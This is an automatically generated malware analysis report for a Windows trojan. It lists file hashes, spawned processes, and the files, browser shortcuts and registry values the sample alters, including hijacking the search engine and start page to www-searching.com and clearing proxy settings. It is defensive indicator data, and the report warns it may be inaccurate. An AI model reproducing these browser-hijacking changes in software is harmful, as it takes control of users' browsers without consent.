• Stay aware

    Inquietari sueti praenturis et stationibus servabantur agrariis

  • How to get the best

    Inquietari sueti praenturis et stationibus servabantur agrariis

  • Help us

    Inquietari sueti praenturis et stationibus servabantur agrariis

  • Forum

    Inquietari sueti praenturis et stationibus servabantur agrariis

Thu, 03/30/2017 - 12:10

Gen.Variant.Kazy.746779_16f4b6f13e

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.746779 (B) (Emsisoft), Gen:Variant.Kazy.746779 (AdAware), mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS) Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

Summary

MD5: 16f4b6f13e3e20e37edf9403c894fe80

SHA1: 73429446915087ec7b4ae2cc5a68f13f9d3c0150

SHA256: 294883e4d17afba42cfd8dddbbbdca386d1ce67e25bd743e75deb07fb4c592f9

SSDeep: 24576:qTJMjonewo QkE3pGq/g8LaGCCmH/u pvFfU jEBbTr/:YeDwoFk0pfLPCCmH/dlFxEBbTr/

Size: 1085952 bytes

File type: EXE

Platform: WIN32

Entropy: Not Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2015-10-10 06:19:11

Analyzed on: Windows7 SP1 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

smu.exe:2540
smu.exe:3356
sma.exe:308
sma.exe:4008
sma.exe:3164
sma.exe:3192
%original file name%.exe:3380
%original file name%.exe:264
smp.exe:3444
smp.exe:2836
tcpsvcs.exe:3488
tcpsvcs.exe:1504

The Trojan injects its code into the following process(es): No processes have been created.

Mutexes

The following mutexes were created/opened: No objects were found.

File activity

The process smu.exe:2540 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\ProgramData\SearchModulePlus\smhe.js (407 bytes)

The process smu.exe:3356 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Windows\Temp\Pre83CF.tmp (601 bytes)
C:\ProgramData\SearchModulePlus\smhe.js (407 bytes)
C:\Windows\Temp\Pre93AB.tmp (601 bytes)
C:\Windows\Temp\Web93AC.tmp (63 bytes)
C:\Windows\Temp\Pre83E0.tmp (601 bytes)
C:\Windows\Temp\Web83D0.tmp (63 bytes)
C:\Windows\Temp\Web83E1.tmp (63 bytes)

The Trojan deletes the following file(s):

C:\Windows\Temp\Pre93AB.tmp (0 bytes)
C:\Windows\Temp\Pre83CF.tmp (0 bytes)
C:\Windows\Temp\Pre83E0.tmp (0 bytes)

The process %original file name%.exe:3380 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_13704\%original file name%.exe (7433 bytes)

The process %original file name%.exe:264 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Installytd_6828\%original file name%.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_22888\bxsdk32.dll (1192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_9822\%original file name%.exe (7433 bytes)

The process smp.exe:3444 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)

The process smp.exe:2836 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk (1 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Search.lnk (1 bytes)

The process tcpsvcs.exe:3488 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\search-metadata.json (95 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Preferences (11028 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\searchplugins\smod.xml (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (9416 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (388 bytes)

The process tcpsvcs.exe:1504 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (10136 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns715C.tmp (14 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns8C5D.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsExec.dll (14 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (45051 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns85B7.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\AccD.dll (7392 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns96D9.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsProcess.dll (12 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll (3616 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (12088 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (56684 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF8.tmp (245963 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smp.exe (6584 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EFA.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns8C5D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsExec.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\System.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns85B7.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsc6EE8.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\AccD.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns96D9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsProcess.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns715C.tmp (0 bytes)

Registry activity

The process smu.exe:2540 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "40 CB 63 41 C7 74 17 84 EA 5E F9 24 AE E1 DA 8A"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Wow6432Node\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Spt" = "1B 39 48 C8 E0 BD 90 00 51 86 E1 DD 14 43 97 BC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Gcf" = "80 46 55 E5 90 D4 4A C0 31 0A 29 D6 59 11 73 09"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process smu.exe:3356 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Rlt" = "Type: REG_QWORD, Length: 8"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "46 A0 C0 5B 56 BA 84 71 70 9D 4F 8D 92 7C EE 47"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Ult" = "Type: REG_QWORD, Length: 8"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sma.exe:308 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"FileTracingMask" = "4294901760"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sma.exe:4008 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sma.exe:3164 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sma.exe:3192 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:3380 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{E549E976-C5F2-4E77-819D-55BC9B7C25BC}"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0C 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:264 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\SearchModulePlus\Success]
"Install" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\SearchModulePlus\Success]
"InstallStr" = "ok"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"
"MaxConnectionsPer1_0Server" = "2"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process smp.exe:3444 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The process smp.exe:2836 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesVersion" = "2"
"Favorites" = "00 7C 01 00 00 14 00 1F 80 C8 27 34 1F 10 5C 10"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"@zipfldr.dll,-10148" = "Compressed (zipped) folder"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesChanges" = "9"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32]
"FXSRESM.dll,-120" = "Fax recipient"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesResolve" = "CC 02 00 00 4C 00 00 00 01 14 02 00 00 00 00 00"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
"@sendmail.dll,-21" = "Desktop (create shortcut)"
"@sendmail.dll,-4" = "Mail recipient"

The process tcpsvcs.exe:3488 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www-searching.com/search.aspx?s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&site=shyosie&prd=set&q={searchTerms}"
"URL" = "http://www-searching.com/search.aspx?s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&site=shyosie&prd=set&q={searchTerms}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"(Default)" = "Type: REG_SZ, Length: 0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURLFallback" = "http://www-searching.com/search.aspx?s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&site=shyosie&prd=set&q={searchTerms}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"SuggestionsURLFallback" = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE8SSC&market={language}"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"DisplayName" = "Search Module"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"DisplayName" = "Bing"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"URL" = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"SuggestionsURLFallback" = "http://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"TopResultURLFallback" = "http://www.bing.com/search?q={searchTerms}&src=ie9tr"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www-searching.com/?pid=s&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&vp=ch&prd=set"

